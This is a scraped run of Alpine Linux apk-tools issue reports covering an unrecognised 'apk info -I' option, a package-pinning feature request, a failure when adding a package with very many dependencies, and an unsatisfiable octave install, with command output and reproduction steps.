I've gone back to Alpine 3.12.3 where this still worked.https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10733apk info does not recognise -I parameter, only the longer --rinstall-if2021-01-17T13:04:33ZGábor ADORJÁNIapk info does not recognise -I parameter, only the longer --rinstall-ifEnvironment: Alpine 3.13, apk-tools-2.12.0-r4
Example, I guess it is self-explanatory:
```
# apk info -I lxc
apk: unrecognized option: I
apk-tools 2.12.0, compiled for x86_64.
usage: apk info [<OPTIONS>...] PACKAGES...
or: apk info...Environment: Alpine 3.13, apk-tools-2.12.0-r4
Example, I guess it is self-explanatory:
```
# apk info -I lxc
apk: unrecognized option: I
apk-tools 2.12.0, compiled for x86_64.
usage: apk info [<OPTIONS>...] PACKAGES...
or: apk info -W FILE
Description:
apk info prints information known about the listed packages. By default, it
prints the description, webpage, and installed size of the package
(equivalent to apk info -dws).
Global options:
-f, --force Enable selected --force-* options (deprecated)
-i, --interactive Ask confirmation before performing certain
operations
-p, --root <ROOT> Manage file system at ROOT
-q, --quiet Print less information
-U, --update-cache Alias for '--cache-max-age 1'
-v, --verbose Print more information (can be specified twice)
-V, --version Print program version and exit
-X, --repository <REPO>
Specify additional package repository
--allow-untrusted Install packages with untrusted signature or no
signature
--arch ARCH Temporarily override architecture, to be combined
with --root
--cache-dir CACHEDIR Temporarily override the cache directory
--cache-max-age AGE Maximum AGE (in minutes) for index in cache before
it's refreshed
--force-binary-stdout
Continue even if binary data will be printed to the
terminal
--force-broken-world Continue even if WORLD cannot be satisfied
--force-non-repository
Continue even if packages may be lost on reboot
--force-old-apk Continue even if packages use unsupported features
--force-overwrite Overwrite files in other packages
--force-refresh Do not use cached files (local or from proxy)
--keys-dir KEYSDIR Override directory of trusted keys
--no-cache Do not use any local cache path
--no-network Do not use the network
--no-progress Disable progress bar even for TTYs
--print-arch Print default arch and exit
--progress Show progress
--progress-fd FD Write progress to the specified file descriptor
--purge Delete modified configuration files on package
removal and uninstalled packages from cache on cache
clean
--repositories-file REPOFILE
Override system repositories, see repositories
--wait TIME Wait for TIME seconds to get an exclusive repository
lock before failing
Info options:
-a, --all List all information known about the package
-d, --description Print the package description
-e, --installed Check package installed status
-L, --contents List files included in the package
-i, --install-if List the package's install_if rule
-I, --rinstall-if List other packages whose install_if rules refer to
this package
-r, --rdepends List reverse dependencies of the package (all other
packages which depend on the package)
-R, --depends List the dependencies of the package
-s, --size Print the package's installed size
-w, --webpage Print the URL for the package's upstream webpage
-W, --who-owns Print the package which owns the specified file
--license Print the package SPDX license identifier
--replaces List the other packages for which this package is
marked as a replacement
--triggers Print active triggers for the package
For more information: man 8 apk-info
# apk info --rinstall-if lxc
lxc-4.0.6-r1 affects auto-installation of:
lxc-lvm-4.0.6-r1
lxc-openrc-4.0.6-r1
lxc-doc-4.0.6-r1
#
```https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10732apk policy: add feature to hold/pin packages2022-12-21T19:37:22ZJ0WIapk policy: add feature to hold/pin packagesI'd like to prevent apk from installing or upgrading specific packages.
Use cases are preventing apk from overriding custom builds or prevent a specific broken update while others keep updating.I'd like to prevent apk from installing or upgrading specific packages.
Use cases are preventing apk from overriding custom builds or prevent a specific broken update while others keep updating.v3.1https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10731Failed to add a package if there is too much dependencies2021-01-25T15:38:52ZThibault FerranteFailed to add a package if there is too much dependenciesWhen a package has too much dependencies (in my example >=755), `apk add` fails with a non explicit error message.
This can be reproduced with docker like this:
- Create an [APKBUILD](/uploads/6a80b53da00bf3d8a098cfe915f716b6/APKBUILD) ...When a package has too much dependencies (in my example >=755), `apk add` fails with a non explicit error message.
This can be reproduced with docker like this:
- Create an [APKBUILD](/uploads/6a80b53da00bf3d8a098cfe915f716b6/APKBUILD) and put it in it dedicated folder (test-f)
- Docker command `docker run --rm -it -v "$(pwd):/workdir" -w /workdir alpine:3.12 /bin/sh`
- Generation and triggering of the bug
```
apk add abuild
abuild-keygen -a -n -q
( cd test-f/ && abuild -Fr )
apk add darkhttpd
darkhttpd /root/packages &
apk info --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
apk update --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
apk add --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
```
This is triggering this message :
```
/workdir/test-f # apk add --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
ERROR: unsatisfiable constraints:
test (missing):
required by: test-f-1.0-r0[test]
```https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10730installation of octave does not work2020-12-29T12:21:02ZErnst Reißnerinstallation of octave does not workThis is not a bug on apk but seemingly a problem with the package.
Trying
```
apk add octave --repository http://dl-cdn.alpinelinux.org/alpine/edge/testing
```
fails with
```
ERROR: unsatisfiable constraints:
so:libhdf5.so.200 (miss...This is not a bug on apk but seemingly a problem with the package.
Trying
```
apk add octave --repository http://dl-cdn.alpinelinux.org/alpine/edge/testing
```
fails with
```
ERROR: unsatisfiable constraints:
so:libhdf5.so.200 (missing):
required by: octave-6.1.0-r3[so:libhdf5.so.200]
so:libqhull.so.8.0 (missing):
required by: octave-6.1.0-r3[so:libqhull.so.8.0]
```
Shall these packages be in testing also??